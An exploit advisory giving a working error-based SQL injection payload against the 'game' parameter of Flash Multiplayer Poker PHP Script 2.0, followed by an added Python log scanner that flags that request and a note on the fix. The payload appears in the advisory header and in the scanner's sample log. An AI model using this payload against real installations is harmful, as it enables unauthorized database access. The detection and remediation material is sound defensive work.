# # # # #
# Exploit Title: Flash Multiplayer Poker PHP Script 2.0 - SQL Injection
# Dork: N/A
# Date: 28.08.2017
# Vendor Homepage: http://www.flashpoker.it/
# Software Link: https://www.codester.com/items/559/flash-poker-v2-multiplayer-poker-php-script
# Demo: http://www.flashpoker.it/index/
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game=[SQL]
#
# 1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31
#
# Etc..
# # # # #
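A log check for the request shown in the proof of concept, added here as an example and not part of the original advisory: it flags hits on the pkr_viewgamehistory route whose game value is not a plain decimal number. The combined access-log format, the assumption that a legitimate game id is numeric, and the sample entries are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Building blocks of the error-based payload in the PoC. Matched case-insensitively
# because the PoC mixes upper and lower case in every keyword.
ERROR_BASED_RE = re.compile(
    r'group\s+by|concat_ws\s*\(|floor\s*\(\s*rand\s*\(|having\s', re.I)

BASE = '/index.php?act_value=pkr_www&sub_act_value=pkr_viewgamehistory&game='
POC = '1+Or+0x31+gRoUp+bY+ConCAT_WS(0x3a,VeRsiON(),fLoOR(rAnD(0)*2))+hAvING+MIn(0)+OR+0x31'
SAMPLE_LOG = [  # constructed entries; addresses are from the documentation range
    f'192.0.2.10 - - [28/Aug/2017:10:00:01 +0000] "GET {BASE}17 HTTP/1.1" 200 5120',
    f'192.0.2.44 - - [28/Aug/2017:10:00:07 +0000] "GET {BASE}{POC} HTTP/1.1" 200 812',
    '192.0.2.10 - - [28/Aug/2017:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 200 318',
    f'192.0.2.51 - - [28/Aug/2017:10:00:12 +0000] "GET {BASE}abc HTTP/1.1" 200 300',
]

def classify(line):
    """Return None for unrelated or benign entries, else a short reason string."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs decodes %xx escapes and turns '+' into a space before matching.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if params.get("sub_act_value") != ["pkr_viewgamehistory"]:
        return None
    values = params.get("game", [])
    if not values:
        return None
    # Assumption: a legitimate game id is a short decimal number.
    if len(values) == 1 and re.fullmatch(r"\d{1,10}", values[0]):
        return None
    if any(ERROR_BASED_RE.search(v) for v in values):
        return "error-based SQLi pattern in game"
    return "non-numeric game value"

def scan(lines):
    """Return [(line_number, reason)] for every flagged entry."""
    results = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, reason) for n, reason in results if reason]

if __name__ == "__main__":
    for n, reason in scan(SAMPLE_LOG):
        print(n, reason)
```

The same allow-list test (decimal digits only) applied to game before it reaches the query, or a parameterized query, is the corresponding fix on the application side.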